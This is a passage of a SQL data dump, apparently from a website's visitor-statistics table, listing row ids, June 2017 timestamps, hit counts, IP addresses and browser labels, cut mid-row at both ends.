1497627137,1,1,0,0,'46.211.156.179','other'),(122318,1497627153,1,1,0,0,'164.132.161.24','other'),(122319,1497627313,1,0,1,0,'66.249.76.91',''),(122320,1497627727,1,1,0,0,'217.182.132.23','other'),(122321,1497627806,1,0,1,0,'68.180.230.48',''),(122322,1497627995,1,1,0,0,'51.255.71.125','other'),(122323,1497628464,1,1,0,0,'81.209.177.189','other'),(122324,1497628919,1,1,0,0,'37.73.196.42','chrome'),(122325,1497629029,1,0,1,0,'66.249.66.201',''),(122326,1497629150,1,1,0,0,'217.182.132.51','other'),(122327,1497629632,1,1,0,0,'164.132.161.2','other'),(122328,1497629694,1,1,0,0,'51.255.71.114','other'),(122329,1497629701,1,1,0,0,'217.182.132.30','other'),(122330,1497629820,1,1,0,0,'180.76.15.143','other'),(122331,1497629945,1,0,1,0,'66.249.66.201',''),(122332,1497629946,1,1,0,0,'164.132.161.24','other'),(122333,1497630227,1,1,0,0,'51.255.65.74','other'),(122334,1497630294,1,1,0,0,'51.255.65.21','other'),(122335,1497630660,1,1,0,0,'164.132.161.73','other'),(122336,1497631493,1,0,1,0,'66.249.66.195',''),(122337,1497631812,1,0,1,0,'66.249.76.89',''),(122338,1497631950,1,1,0,0,'51.255.65.78','other'),(122339,1497632375,1,1,0,0,'164.132.161.76','other'),(122340,1497633088,1,1,0,0,'176.8.141.224','chrome'),(122341,1497633390,1,1,0,0,'188.166.87.249','chrome'),(122342,1497633685,1,1,0,0,'164.132.161.94','other'),(122343,1497633960,1,1,0,0,'164.132.161.37','other'),(122344,1497634033,1,1,0,0,'51.255.71.121','other'),(122345,1497634108,1,1,0,0,'217.182.132.67','other'),(122346,1497634496,1,0,1,0,'68.180.230.48',''),(122347,1497634513,1,1,0,0,'217.182.132.66','other'),(122348,1497634584,1,1,0,0,'51.255.65.77','other'),(122349,1497634912,1,0,1,0,'66.249.66.195',''),(122350,1497635054,1,1,0,0,'51.255.65.94','other'),(122351,1497635055,1,1,0,0,'51.255.65.69','other'),(122352,1497635081,1,1,0,0,'164.132.161.73','other'),(122353,1497635358,1,1,0,0,'151.80.27.118','other'),(122354,1497635459,1,1,0,0,'164.132.161.58','other'),(122355,1497635541,1,1,0,0,'180.76.15.155','other'),(122356,1497635796,1,1,0,0,'8.29.198.27','other'),(122357,1497636103,1,1,0,0,'91.196.178.69','chrome'),(122358,1497636225,1,1,0,0,'51.255.65.25','other'),(122359,1497636327,1,1,0,0,'217.182.132.25','other'),(122360,1497636511,1,1,0,0,'51.255.65.14','other'),(122361,1497636916,1,1,0,0,'217.182.132.54','other'),(122362,1497636946,1,1,0,0,'37.54.23.13','chrome'),(122363,1497637051,1,1,0,0,'91.196.178.162','chrome'),(122364,1497637403,1,1,0,0,'85.114.208.135','chrome'),(122365,1497637581,1,1,0,0,'51.255.71.126','other'),(122366,1497637848,1,1,0,0,'217.182.132.55','other'),(122367,1497638187,1,1,0,0,'207.46.13.176','other'),(122368,1497638391,1,1,0,0,'178.95.156.151','chrome'),(122369,1497638542,1,1,0,0,'217.182.132.27','other'),(122370,1497638592,1,1,0,0,'194.44.121.188','chrome'),(122371,1497638692,1,0,1,0,'66.249.66.156',''),(122372,1497638846,1,1,0,0,'137.74.207.108','other'),(122373,1497639231,1,1,0,0,'37.115.156.177','other'),(122374,1497639499,1,1,0,0,'137.74.207.116','other'),(122375,1497639773,1,1,0,0,'54.165.59.7','other'),(122376,1497639976,1,1,0,0,'5.255.253.34','other'),(122377,1497640074,1,1,0,0,'91.196.178.161','chrome'),(122378,1497640137,1,1,0,0,'141.8.142.134','other'),(122379,1497640144,1,1,0,0,'216.244.66.237','other'),(122380,1497640741,1,1,0,0,'51.255.65.30','other'),(122381,1497640790,1,1,0,0,'217.182.132.82','other'),(122382,1497640826,1,1,0,0,'217.182.132.92','other'),(122383,1497640844,1,1,0,0,'217.182.132.147','other'),(122384,1497641038,1,1,0,0,'91.196.178.39','chrome'),(122385,1497641064,1,0,1,0,'66.249.76.89',''),(122386,1497641143,1,0,1,0,'66.249.76.109',''),(122387,1497641918,1,1,0,0,'217.182.132.188','other'),(122388,1497642093,1,1,0,0,'217.182.132.69','other'),(122389,1497642818,1,1,0,0,'51.255.65.45','other'),(122390,1497642925,1,1,0,0,'193.107.73.7','chrome'),(122391,1497643245,1,1,0,0,'51.255.65.69','other'),(122392,1497643292,1,1,0,0,'164.132.162.156','other'),(122393,1497643414,1,1,0,0,'66.249.76.93','chrome'),(122394,1497643445,2,1,1,0,'66.249.76.107',''),(122395,1497644142,1,0,1,0,'66.249.76.89',''),(122396,1497644620,1,1,0,0,'91.196.178.71','firefox'),(122397,1497644864,1,1,0,0,'51.255.65.21','other'),(122398,1497645012,1,0,1,0,'66.249.76.93',''),(122399,1497645331,1,0,1,0,'66.249.66.156',''),(122400,1497645596,1,1,0,0,'164.132.161.54','other'),(122401,1497645875,1,1,0,0,'195.10.210.49','firefox'),(122402,1497646001,1,1,0,0,'217.182.132.6','other'),(122403,1497646091,1,1,0,0,'164.132.161.76','other'),(122404,1497646642,1,1,0,0,'8.29.198.25','other'),(122405,1497646986,1,1,0,0,'216.244.66.237','other'),(122406,1497647066,1,0,1,0,'66.249.76.107',''),(122407,1497647173,1,1,0,0,'217.182.132.150','other'),(122408,1497647227,1,1,0,0,'51.255.65.97','other'),(122409,1497647247,1,1,0,0,'137.74.207.164','other'),(122410,1497647355,1,1,0,0,'217.182.132.70','other'),(122411,1497647898,1,1,0,0,'51.255.71.125','other'),(122412,1497648453,1,0,1,0,'66.249.76.89',''),(122413,1497648851,1,1,0,0,'66.249.76.108','chrome'),(122414,1497649241,1,1,0,0,'164.132.162.156','other'),(122415,1497649458,1,1,0,0,'137.74.201.99','other'),(122416,1497649831,1,1,0,0,'51.255.65.20','other'),(122417,1497649952,1,1,0,0,'217.182.132.62','other'),(122418,1497650115,1,1,0,0,'51.255.65.38','other'),(122419,1497650272,1,1,0,0,'51.255.65.95','other'),(122420,1497650437,1,0,1,0,'66.249.76.108',''),(122421,1497651192,1,1,0,0,'66.249.76.108','chrome'),(122422,1497651530,2,0,2,0,'66.249.76.89',''),(122423,1497651732,1,0,1,0,'66.249.66.75',''),(122424,1497651877,1,1,0,0,'164.132.161.69','other'),(122425,1497651914,1,1,0,0,'51.255.65.63','other'),(122426,1497652015,1,0,1,0,'66.249.66.76',''),(122427,1497652106,1,1,0,0,'217.182.132.171','other'),(122428,1497652234,1,1,0,0,'164.132.161.29','other'),(122429,1497652357,1,0,1,0,'66.249.76.91',''),(122430,1497652912,1,1,0,0,'51.255.65.44','other'),(122431,1497652929,1,1,0,0,'217.182.132.185','other'),(122432,1497653299,1,1,0,0,'217.182.132.6','other'),(122433,1497653426,1,1,0,0,'137.74.201.100','other'),(122434,1497653505,1,1,0,0,'157.55.39.178','other'),(122435,1497654132,1,1,0,0,'51.255.65.93','other'),(122436,1497654303,1,0,1,0,'66.249.66.76',''),(122437,1497654328,1,0,1,0,'66.249.76.91',''),(122438,1497654360,1,1,0,0,'137.74.201.100','other'),(122439,1497654554,1,0,1,0,'66.249.66.74',''),(122440,1497654638,1,1,0,0,'164.132.161.50','other'),(122441,1497654842,1,1,0,0,'164.132.161.72','other'),(122442,1497654846,1,0,1,0,'66.249.66.156',''),(122443,1497655193,1,0,1,0,'66.249.76.107',''),(122444,1497655318,1,1,0,0,'51.255.71.125','other'),(122445,1497655749,1,1,0,0,'164.132.161.28','other'),(122446,1497655859,2,0,2,0,'66.249.76.91',''),(122447,1497656085,1,1,0,0,'217.182.132.150','other'),(122448,1497656351,1,1,0,0,'164.132.161.47','other'),(122449,1497656390,1,0,1,0,'66.249.76.89',''),(122450,1497656396,1,1,0,0,'157.55.39.178','other'),(122451,1497657215,1,1,0,0,'217.182.132.37','other'),(122452,1497657315,1,1,0,0,'213.251.194.42','other'),(122453,1497657327,1,1,0,0,'164.132.161.56','other'),(122454,1497657349,1,1,0,0,'164.132.161.66','other'),(122455,1497657415,1,1,0,0,'217.182.132.85','other'),(122456,1497657476,1,1,0,0,'8.29.198.25','other'),(122457,1497657755,1,1,0,0,'207.46.13.176','other'),(122458,1497658259,1,1,0,0,'217.182.132.63','other'),(122459,1497658386,1,0,1,0,'66.249.76.93',''),(122460,1497659273,1,1,0,0,'164.132.161.54','other'),(122461,1497660188,1,1,0,0,'137.74.207.164','other'),(122462,1497660429,1,1,0,0,'164.132.161.7','other'),(122463,1497660534,1,1,0,0,'164.132.161.71','other'),(122464,1497660542,1,1,0,0,'66.249.76.108','chrome'),(122465,1497660709,1,1,0,0,'164.132.162.188','other'),(122466,1497660809,1,0,1,0,'66.249.76.109',''),(122467,1497660815,1,1,0,0,'51.255.65.19','other'),(122468,1497660958,1,1,0,0,'137.74.207.109','other'),(122469,1497662112,1,0,1,0,'66.249.76.89',''),(122470,1497662126,1,1,0,0,'51.255.65.59','other'),(122471,1497662148,1,0,1,0,'66.249.66.75',''),(122472,1497662737,1,0,1,0,'66.249.76.93',''),(122473,1497662746,1,1,0,0,'51.255.65.43','other'),(122474,1497662823,1,1,0,0,'66.249.76.109','chrome'),(122475,1497662957,1,1,0,0,'164.132.161.58','other'),(122476,1497662966,1,1,0,0,'217.182.132.21','other'),(122477,1497663036,1,1,0,0,'157.55.39.178','other'),(122478,1497663096,1,0,1,0,'66.249.76.89',''),(122479,1497663261,1,1,0,0,'51.255.65.60','other'),(122480,1497663346,1,1,0,0,'51.255.65.50','other'),(122481,1497663364,1,1,0,0,'217.182.132.79','other'),(122482,1497663618,1,1,0,0,'217.182.132.150','other'),(122483,1497663637,1,1,0,0,'164.132.161.21','other'),(122484,1497663968,1,1,0,0,'66.249.66.74','chrome'),(122485,1497664403,1,1,0,0,'217.182.132.69','other'),(122486,1497664576,1,1,0,0,'164.132.161.48','other'),(122487,1497664983,1,0,1,0,'66.249.76.108',''),(122488,1497665476,1,1,0,0,'51.255.65.92','other'),(122489,1497665767,1,0,1,0,'66.249.76.107',''),(122490,1497666207,1,1,0,0,'217.182.132.21','other'),(122491,1497666441,1,1,0,0,'164.132.164.180','other'),(122492,1497667387,1,1,0,0,'164.132.161.40','other'),(122493,1497667398,1,1,0,0,'164.132.162.155','other'),(122494,1497667617,1,0,1,0,'66.249.76.108',''),(122495,1497667619,1,0,1,0,'68.180.230.48',''),(122496,1497668036,1,0,1,0,'66.249.76.93',''),(122497,1497668117,1,1,0,0,'164.132.161.43','other'),(122498,1497668186,1,1,0,0,'164.132.161.68','other'),(122499,1497668301,1,1,0,0,'137.74.207.170','other'),(122500,1497668305,1,1,0,0,'8.29.198.26','other'),(122501,1497668369,1,1,0,0,'51.255.71.115','other'),(122502,1497669209,1,1,0,0,'164.132.161.43','other'),(122503,1497669406,1,1,0,0,'217.182.132.82','other'),(122504,1497669561,1,1,0,0,'137.74.201.100','other'),(122505,1497669721,1,1,0,0,'217.182.132.17','other'),(122506,1497669899,2,0,2,0,'66.249.76.93',''),(122507,1497669972,1,0,1,0,'66.249.66.75',''),(122508,1497670083,1,1,0,0,'217.182.132.57','other'),(122509,1497670292,1,0,1,0,'66.249.66.157',''),(122510,1497670691,1,1,0,0,'164.132.161.44','other'),(122511,1497671088,1,1,0,0,'51.255.65.90','other'),(122512,1497671159,1,1,0,0,'51.255.71.122','other'),(122513,1497671251,1,1,0,0,'51.255.65.14','other'),(122514,1497671271,1,1,0,0,'82.145.220.13','other'),(122515,1497671360,1,1,0,0,'37.73.196.42','chrome'),(122516,1497671403,1,1,0,0,'54.165.59.7','other'),(122517,1497671404,1,1,0,0,'31.13.113.187','other'),(122518,1497671406,1,1,0,0,'31.13.113.194','other'),(122519,1497671407,1,1,0,0,'31.13.114.50','other'),(122520,1497671944,1,1,0,0,'51.255.71.126','other'),(122521,1497672054,1,0,1,0,'66.249.76.93',''),(122522,1497672460,1,1,0,0,'217.182.132.79','other'),(122523,1497672705,2,0,2,0,'66.249.76.89',''),(122524,1497672741,1,1,0,0,'51.255.65.39','other'),(122525,1497672919,1,1,0,0,'217.182.132.65','other'),(122526,1497673680,1,0,1,0,'66.249.76.109',''),(122527,1497674112,1,1,0,0,'51.255.65.21','other'),(122528,1497674472,3,0,3,0,'66.249.76.91',''),(122529,1497674713,1,1,0,0,'217.182.132.34','other'),(122530,1497675125,1,1,0,0,'164.132.161.47','other'),(122531,1497675370,1,0,1,0,'66.249.66.76',''),(122532,1497675574,1,0,1,0,'66.249.76.91',''),(122533,1497675675,1,1,0,0,'164.132.161.28','other'),(122534,1497675704,1,1,0,0,'217.182.132.152','other'),(122535,1497676034,1,0,1,0,'66.249.66.75',''),(122536,1497676045,1,1,0,0,'217.182.132.176','other'),(122537,1497676215,1,1,0,0,'217.182.132.24','other'),(122538,1497676406,1,1,0,0,'51.255.65.14','other'),(122539,1497676650,1,1,0,0,'217.182.132.172','other'),(122540,1497677475,1,1,0,0,'164.132.161.8','other'),(122541,1497677476,1,1,0,0,'216.244.66.237','other'),(122542,1497677687,1,1,0,0,'51.255.65.5','other'),(122543,1497677688,1,0,1,0,'66.249.76.109',''),(122544,1497677758,1,1,0,0,'193.194.127.217','firefox'),(122545,1497677893,1,1,0,0,'51.255.65.85','other'),(122546,1497678135,1,1,0,0,'157.55.39.54','other'),(122547,1497678748,1,0,1,0,'66.249.66.156',''),(122548,1497679139,1,1,0,0,'8.29.198.25','other'),(122549,1497679787,1,1,0,0,'164.132.162.159','other'),(122550,1497679895,1,1,0,0,'93.158.152.107','other'),(122551,1497680350,1,1,0,0,'217.182.132.59','other'),(122552,1497680532,1,0,1,0,'66.249.66.157',''),(122553,1497680978,1,1,0,0,'217.182.132.58','other'),(122554,1497681334,1,1,0,0,'51.255.65.60','other'),(122555,1497681520,1,1,0,0,'217.182.132.70','other'),(122556,1497681927,1,1,0,0,'217.182.132.178','other'),(122557,1497681936,1,1,0,0,'164.132.161.66','other'),(122558,1497682216,1,1,0,0,'176.14.254.240','chrome'),(122559,1497682285,1,1,0,0,'51.255.65.72','other'),(122560,1497682311,1,1,0,0,'164.132.161.65','other'),(122561,1497682422,1,1,0,0,'151.80.27.116','other'),(122562,1497682568,1,1,0,0,'51.255.71.128','other'),(122563,1497683328,1,1,0,0,'51.255.71.125','other'),(122564,1497683653,1,1,0,0,'164.132.161.16','other'),(122565,1497684023,1,1,0,0,'164.132.161.76','other'),(122566,1497684200,1,1,0,0,'51.255.71.117','other'),(122567,1497684688,1,1,0,0,'88.202.190.197','chrome'),(122568,1497685213,1,1,0,0,'91.196.178.37','chrome'),(122569,1497685385,1,1,0,0,'217.182.132.71','other'),(122570,1497685523,1,1,0,0,'217.182.132.91','other'),(122571,1497685541,1,1,0,0,'51.255.65.16','other'),(122572,1497686067,1,0,1,0,'66.249.66.156',''),(122573,1497686076,2,2,0,0,'46.133.166.85','chrome'),(122574,1497686227,1,1,0,0,'91.209.11.236','other'),(122575,1497686451,1,1,0,0,'91.196.178.129','chrome'),(122576,1497686634,1,1,0,0,'91.196.178.129','firefox'),(122577,1497686649,1,0,1,0,'68.180.231.23',''),(122578,1497686781,1,1,0,0,'51.255.65.16','other'),(122579,1497687173,1,0,1,0,'66.249.76.109',''),(122580,1497687174,1,1,0,0,'66.102.9.25','chrome'),(122581,1497687214,1,1,0,0,'51.255.65.33','other'),(122582,1497687486,1,1,0,0,'217.182.132.29','other'),(122583,1497687620,1,0,1,0,'66.249.76.93',''),(122584,1497687630,4,4,0,0,'178.154.200.42','other'),(122585,1497687742,5,5,0,0,'5.255.253.54','other'),(122586,1497687746,4,4,0,0,'141.8.132.47','other'),(122587,1497687759,5,5,0,0,'141.8.142.152','other'),(122588,1497687811,1,1,0,0,'51.255.65.85','other'),(122589,1497687998,2,2,0,0,'37.9.113.11','other'),(122590,1497688176,2,2,0,0,'5.255.253.23','other'),(122591,1497688209,1,1,0,0,'137.74.201.108','other'),(122592,1497688224,1,1,0,0,'5.255.253.46','other'),(122593,1497688231,1,1,0,0,'141.8.132.37','other'),(122594,1497688234,1,1,0,0,'178.154.200.67','other'),(122595,1497688238,1,1,0,0,'95.108.181.27','other'),(122596,1497688262,1,1,0,0,'95.108.213.25','other'),(122597,1497688266,1,1,0,0,'141.8.142.39','other'),(122598,1497688269,1,1,0,0,'5.255.253.27','other'),(122599,1497688548,1,1,0,0,'164.132.161.12','other'),(122600,1497688829,1,1,0,0,'164.132.161.87','other'),(122601,1497688838,1,1,0,0,'217.182.132.76','other'),(122602,1497688846,1,1,0,0,'51.255.65.73','other'),(122603,1497689112,1,1,0,0,'37.54.23.13','chrome'),(122604,1497689289,1,0,1,0,'66.249.76.93',''),(122605,1497689306,1,1,0,0,'217.182.132.62','other'),(122606,1497689972,1,1,0,0,'8.29.198.26','other'),(122607,1497690443,1,1,0,0,'51.255.65.27','other'),(122608,1497691261,1,0,1,0,'66.249.76.109',''),(122609,1497691638,1,1,0,0,'91.196.178.135','chrome'),(122610,1497691922,1,1,0,0,'51.255.65.18','other'),(122611,1497691927,1,1,0,0,'51.255.65.47','other'),(122612,1497691946,1,1,0,0,'66.249.76.93','chrome'),(122613,1497692217,1,1,0,0,'217.182.132.54','other'),(122614,1497692322,1,1,0,0,'207.46.13.82','other'),(122615,1497693031,1,1,0,0,'217.182.132.31','other'),(122616,1497693192,1,0,1,0,'66.249.76.93',''),(122617,1497693307,1,1,0,0,'54.165.59.7','other'),(122618,1497693851,1,1,0,0,'217.182.132.191','other'),(122619,1497694213,1,1,0,0,'217.182.132.79','other'),(122620,1497694356,1,1,0,0,'5.255.253.54','other'),(122621,1497694740,1,1,0,0,'51.255.65.42','other'),(122622,1497695325,1,1,0,0,'37.53.224.83','chrome'),(122623,1497695330,1,0,1,0,'66.249.66.157',''),(122624,1497695498,1,0,1,0,'66.249.66.155',''),(122625,1497696434,1,1,0,0,'176.195.104.123','msie'),(122626,1497696585,1,0,1,0,'68.180.230.48',''),(122627,1497696716,1,1,0,0,'164.132.162.159','other'),(122628,1497696783,1,0,1,0,'66.249.76.109',''),(122629,1497697363,1,1,0,0,'164.132.161.84','other'),(122630,1497697589,1,1,0,0,'91.196.178.161','chrome'),(122631,1497697614,1,1,0,0,'216.244.66.237','other'),(122632,1497697962,1,1,0,0,'164.132.161.87','other'),(122633,1497698006,1,1,0,0,'217.182.132.150','other'),(122634,1497698247,1,1,0,0,'217.182.132.94','other'),(122635,1497698368,1,1,0,0,'217.182.132.187','other'),(122636,1497698489,1,1,0,0,'51.255.65.96','other'),(122637,1497698895,1,0,1,0,'66.249.66.74',''),(122638,1497699102,1,1,0,0,'91.196.177.72','chrome'),(122639,1497699132,1,1,0,0,'91.196.178.38','chrome'),(122640,1497699138,1,1,0,0,'5.255.253.54','other'),(122641,1497699530,1,1,0,0,'37.53.224.83','chrome'),(122642,1497699879,1,1,0,0,'164.132.161.72','other'),(122643,1497700064,1,1,0,0,'217.182.132.5','other'),(122644,1497700607,1,0,1,0,'66.249.76.89',''),(122645,1497700804,1,1,0,0,'8.29.198.25','other'),(122646,1497700993,1,1,0,0,'46.252.218.81','firefox'),(122647,1497700995,1,1,0,0,'164.132.162.155','other'),(122648,1497701634,1,1,0,0,'51.255.65.4','other'),(122649,1497702015,1,1,0,0,'46.211.2.242','chrome'),(122650,1497702296,1,1,0,0,'164.132.161.54','other'),(122651,1497702509,1,1,0,0,'217.182.132.94','other'),(122652,1497702719,1,1,0,0,'51.255.65.59','other'),(122653,1497703024,1,1,0,0,'51.255.65.67','other'),(122654,1497703420,1,0,1,0,'66.249.66.157',''),(122655,1497703834,1,0,1,0,'66.249.76.107',''),(122656,1497704041,1,0,1,0,'66.249.76.91',''),(122657,1497704087,1,1,0,0,'217.182.132.25','other'),(122658,1497704096,1,0,1,0,'66.249.66.155',''),(122659,1497704279,1,1,0,0,'51.255.65.84','other'),(122660,1497705227,1,1,0,0,'66.249.76.89','chrome'),(122661,1497705248,1,1,0,0,'217.182.132.34','other'),(122662,1497705428,1,1,0,0,'217.182.132.27','other'),(122663,1497705580,1,1,0,0,'217.182.132.172','other'),(122664,1497705612,1,0,1,0,'66.249.66.156',''),(122665,1497705721,1,1,0,0,'66.249.76.93','chrome'),(122666,1497706487,1,1,0,0,'51.255.65.22','other'),(122667,1497706685,1,1,0,0,'164.132.161.43','other'),(122668,1497706711,1,1,0,0,'91.196.178.161','chrome'),(122669,1497707435,1,1,0,0,'217.182.132.178','other'),(122670,1497707850,1,1,0,0,'164.132.161.50','other'),(122671,1497708012,1,1,0,0,'46.200.114.217','chrome'),(122672,1497708310,1,0,1,0,'66.249.66.74',''),(122673,1497708330,1,0,1,0,'66.249.76.109',''),(122674,1497708764,1,1,0,0,'164.132.161.58','other'),(122675,1497709682,1,1,0,0,'66.249.76.91','chrome'),(122676,1497709688,1,1,0,0,'180.76.15.162','other'),(122677,1497710163,1,1,0,0,'212.90.62.173','other'),(122678,1497710603,1,1,0,0,'51.255.65.59','other'),(122679,1497710652,1,1,0,0,'91.196.176.13','chrome'),(122680,1497710714,1,1,0,0,'51.255.65.95','other'),(122681,1497710822,1,1,0,0,'66.249.76.107','chrome'),(122682,1497710893,1,0,1,0,'66.249.76.108',''),(122683,1497711320,1,1,0,0,'217.182.132.151','other'),(122684,1497711360,1,1,0,0,'51.255.65.87','other'),(122685,1497711631,1,1,0,0,'8.29.198.26','other'),(122686,1497711636,1,1,0,0,'51.255.65.36','other'),(122687,1497711811,2,0,2,0,'66.249.76.109',''),(122688,1497711927,1,1,0,0,'164.132.162.188','other'),(122689,1497712370,1,1,0,0,'91.196.178.135','chrome'),(122690,1497712462,1,1,0,0,'164.132.161.44','other'),(122691,1497712584,1,1,0,0,'164.132.161.14','other'),(122692,1497713033,1,0,1,0,'66.249.76.91',''),(122693,1497713073,1,1,0,0,'137.74.207.114','other'),(122694,1497713805,1,1,0,0,'176.195.104.191','msie'),(122695,1497713848,2,2,0,0,'62.80.185.138','chrome'),(122696,1497713944,1,1,0,0,'217.182.132.34','other'),(122697,1497714019,1,1,0,0,'164.132.161.38','other'),(122698,1497714312,1,0,1,0,'66.249.76.107',''),(122699,1497714331,1,1,0,0,'180.76.15.22','other'),(122700,1497714335,1,1,0,0,'180.76.15.13','other'),(122701,1497714628,1,0,1,0,'66.249.66.74',''),(122702,1497714778,1,1,0,0,'217.182.132.175','other'),(122703,1497714781,1,1,0,0,'62.80.185.138','chrome'),(122704,1497714880,1,0,1,0,'66.249.76.89',''),(122705,1497715012,1,1,0,0,'217.182.132.20','other'),(122706,1497715132,1,1,0,0,'51.255.65.97','other'),(122707,1497715475,1,0,1,0,'66.249.76.108',''),(122708,1497715687,1,0,1,0,'66.249.76.109',''),(122709,1497715965,1,1,0,0,'51.255.65.48','other'),(122710,1497716065,1,1,0,0,'51.255.65.37','other'),(122711,1497716218,1,1,0,0,'91.231.40.196','chrome'),(122712,1497716237,1,1,0,0,'93.158.152.14','other'),(122713,1497716239,1,1,0,0,'141.8.132.49','other'),(122714,1497716258,1,1,0,0,'217.182.132.55','other'),(122715,1497716582,1,1,0,0,'195.88.208.134','chrome'),(122716,1497717148,1,1,0,0,'51.255.65.32','other'),(122717,1497717457,1,1,0,0,'63.243.252.185','other'),(122718,1497717575,1,1,0,0,'137.74.207.110','other'),(122719,1497717914,1,1,0,0,'51.255.65.68','other'),(122720,1497718217,1,1,0,0,'217.182.132.37','other'),(122721,1497718432,1,1,0,0,'217.69.133.6','other'),(122722,1497718785,1,1,0,0,'91.124.82.96','chrome'),(122723,1497719135,1,1,0,0,'164.132.161.77','other'),(122724,1497719439,1,1,0,0,'5.255.253.54','other'),(122725,1497719780,1,1,0,0,'37.73.252.219','chrome'),(122726,1497720407,1,1,0,0,'164.132.161.77','other'),(122727,1497720574,1,1,0,0,'217.182.132.62','other'),(122728,1497720774,1,1,0,0,'51.255.71.133','other'),(122729,1497720821,1,1,0,0,'37.54.23.13','chrome'),(122730,1497720924,1,1,0,0,'91.196.178.132','chrome'),(122731,1497721142,18,18,0,0,'163.172.74.104','other'),(122732,1497721534,2,0,2,0,'66.249.66.76',''),(122733,1497721742,1,0,1,0,'66.249.76.89',''),(122734,1497722136,1,1,0,0,'137.74.207.161','other'),(122735,1497722170,3,3,0,0,'91.124.82.96','chrome'),(122736,1497722188,3,0,3,0,'66.249.76.107',''),(122737,1497722251,1,1,0,0,'51.255.65.92','other'),(122738,1497722404,1,1,0,0,'164.132.161.18','other'),(122739,1497722445,1,1,0,0,'51.255.65.69','other'),(122740,1497722454,1,1,0,0,'8.29.198.27','other'),(122741,1497722643,1,0,1,0,'66.249.76.108',''),(122742,1497722662,2,2,0,0,'216.244.66.237','other'),(122743,1497722770,1,0,1,0,'66.249.66.156',''),(122744,1497722896,1,0,1,0,'66.249.76.109',''),(122745,1497723027,1,1,0,0,'217.182.132.59','other'),(122746,1497723742,1,0,1,0,'66.249.76.93',''),(122747,1497723816,1,1,0,0,'185.18.20.53','msie'),(122750,1497723821,1,1,0,0,'176.193.164.99','msie'),(122751,1497723822,1,1,0,0,'128.75.70.46','msie'),(122753,1497724210,1,1,0,0,'164.132.161.68','other'),(122754,1497724366,1,1,0,0,'164.132.161.94','other'),(122755,1497724391,1,1,0,0,'91.196.178.132','chrome'),(122756,1497724830,1,0,1,0,'66.249.76.109',''),(122757,1497725255,2,2,0,0,'108.12.37.82','other'),(122758,1497725377,1,0,1,0,'66.249.66.157',''),(122759,1497725503,1,1,0,0,'164.132.161.82','other'),(122760,1497725828,1,1,0,0,'66.249.76.91','chrome'),(122761,1497726127,1,1,0,0,'51.255.65.22','other'),(122762,1497726251,1,1,0,0,'164.132.161.49','other'),(122763,1497726904,1,0,1,0,'66.249.66.157',''),(122764,1497727713,1,1,0,0,'217.182.132.68','other'),(122765,1497727839,1,1,0,0,'164.132.161.68','other'),(122766,1497728123,1,1,0,0,'164.132.161.6','other'),(122767,1497728180,1,0,1,0,'66.249.66.156',''),(122768,1497728499,1,1,0,0,'217.182.132.21','other'),(122769,1497728706,1,0,1,0,'66.249.76.89',''),(122770,1497728972,1,1,0,0,'95.132.93.191','firefox'),(122771,1497729172,1,1,0,0,'51.255.65.14','other'),(122772,1497729177,1,1,0,0,'217.182.132.71','other'),(122773,1497729244,2,2,0,0,'66.249.76.108','chrome'),(122774,1497729863,1,1,0,0,'217.182.132.53','other'),(122775,1497729909,1,1,0,0,'216.244.66.237','other'),(122776,1497730102,1,1,0,0,'51.255.65.6','other'),(122777,1497730508,1,0,1,0,'66.249.66.157',''),(122778,1497731048,1,1,0,0,'217.69.133.203','other'),(122779,1497731150,1,1,0,0,'178.140.81.36','msie'),(122780,1497731234,1,1,0,0,'40.77.167.44','other'),(122781,1497731264,1,1,0,0,'51.255.65.47','other'),(122782,1497731328,1,1,0,0,'51.255.65.42','other'),(122783,1497731466,1,1,0,0,'51.255.65.85','other'),(122784,1497731592,1,0,1,0,'66.249.76.126',''),(122785,1497732986,1,1,0,0,'51.255.71.125','other'),(122786,1497733077,1,1,0,0,'51.255.71.111','other'),(122787,1497733281,1,1,0,0,'8.29.198.27','other'),(122788,1497733448,1,1,0,0,'137.74.207.164','other'),(122789,1497733764,1,1,0,0,'51.255.65.5','other'),(122790,1497734037,1,1,0,0,'217.182.132.83','other'),(122791,1497734391,1,1,0,0,'164.132.161.49','other'),(122792,1497734622,1,0,1,0,'66.249.76.109',''),(122793,1497734999,1,1,0,0,'217.69.133.203','other'),(122794,1497735137,1,1,0,0,'217.182.132.31','other'),(122795,1497735395,1,1,0,0,'51.255.71.101','other'),(122796,1497735909,1,1,0,0,'217.182.132.151','other'),(122797,1497736449,1,0,1,0,'66.249.76.91',''),(122798,1497736703,1,1,0,0,'51.255.65.78','other'),(122799,1497737565,1,1,0,0,'164.132.161.7','other'),(122800,1497737651,1,1,0,0,'164.132.161.18','other'),(122801,1497737737,1,1,0,0,'217.182.132.70','other'),(122802,1497738603,1,1,0,0,'137.74.207.164','other'),(122803,1497738934,1,1,0,0,'164.132.161.8','other'),(122804,1497739010,1,1,0,0,'139.59.148.0','chrome'),(122805,1497739052,1,1,0,0,'51.255.65.57','other'),(122806,1497739346,1,1,0,0,'178.92.73.67','chrome'),(122807,1497740638,1,1,0,0,'217.182.132.176','other'),(122808,1497740944,1,1,0,0,'164.132.161.45','other'),(122809,1497741111,1,1,0,0,'164.132.162.158','other'),(122810,1497741454,1,1,0,0,'164.132.161.46','other'),(122811,1497741497,1,1,0,0,'146.185.223.87','chrome'),(122812,1497741629,1,1,0,0,'51.255.65.10','other'),(122813,1497741755,1,1,0,0,'164.132.161.2','other'),(122814,1497741836,1,1,0,0,'51.255.71.132','other'),(122815,1497742519,1,1,0,0,'128.69.222.36','chrome'),(122816,1497742728,1,1,0,0,'51.255.65.29','other'),(122817,1497742814,1,1,0,0,'217.182.132.74','other'),(122818,1497742830,1,1,0,0,'51.255.65.65','other'),(122819,1497743105,1,1,0,0,'51.255.65.28','other'),(122820,1497743343,1,1,0,0,'51.255.71.112','other'),(122821,1497743409,1,1,0,0,'164.132.161.14','other'),(122822,1497743539,1,1,0,0,'217.182.132.190','other'),(122823,1497743707,1,1,0,0,'8.37.235.179','chrome'),(122824,1497743953,1,1,0,0,'51.255.65.77','other'),(122825,1497744111,1,1,0,0,'8.29.198.25','other'),(122826,1497744227,2,0,2,0,'66.249.76.93',''),(122827,1497744795,1,1,0,0,'51.255.71.98','other'),(122828,1497745527,1,1,0,0,'207.46.13.177','other'),(122829,1497746048,1,0,1,0,'66.249.76.109',''),(122830,1497747075,1,1,0,0,'216.244.66.237','other'),(122831,1497747450,1,1,0,0,'217.182.132.66','other'),(122832,1497747748,1,1,0,0,'217.182.132.188','other'),(122833,1497748315,1,0,1,0,'68.180.230.48',''),(122834,1497748375,1,1,0,0,'51.255.65.43','other'),(122835,1497748534,1,1,0,0,'217.182.132.96','other'),(122836,